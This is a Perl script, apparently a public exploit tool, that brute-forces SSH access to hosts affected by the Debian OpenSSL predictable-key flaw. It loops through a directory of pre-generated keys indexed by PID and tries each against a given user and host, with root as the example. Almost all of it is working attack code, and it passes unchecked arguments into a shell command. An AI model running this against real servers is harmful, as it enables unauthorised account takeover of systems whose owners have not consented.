#!/usr/bin/perl
#
# Script to bruteforce SSH-account
# Check if host is vulnerable with http://itsecurity.net/
# Download pre-generated keys from http://metasploit.com/users/hdm/tools/debian-openssl/
#
# Starting with PID 1 and goes up!
#

my @file_list;
my %hash_list;

if ($#ARGV < 2) {
   print "Syntax : ./keyscan.pl dirwithSSHkeys username host start_with_pid(optional)\n";
   print "Example: ./keyscan.pl rsa/2048// root localhost 5000\n";
   print "Code: Jonas Thambert jonas@thambert.com\n";
   exit 0;
}


if ( opendir(DIR, "$ARGV[0]") ) {
    foreach my $file( readdir(DIR) ) {
         foreach ($file) {
          next unless m,^[0-9a-f-]+$,;
          push (@file_list, $_);
	  s/(.*)-([0-9]*$)//;
          $hash_file{ $2 } = $1;
    }
  }
}


foreach (sort { $a <=> $b } keys(%hash_file) )
{
if (($ARGV[3] <= $_) || (! $ARGV[3])) {
    system("echo \"trying key: $ARGV[0]/$hash_file{$_}-$_ \"; ssh -q -o PasswordAuthentication=no -l $ARGV[1] -i $ARGV[0]/$hash_file{$_}-$_ $ARGV[2]");
 }
}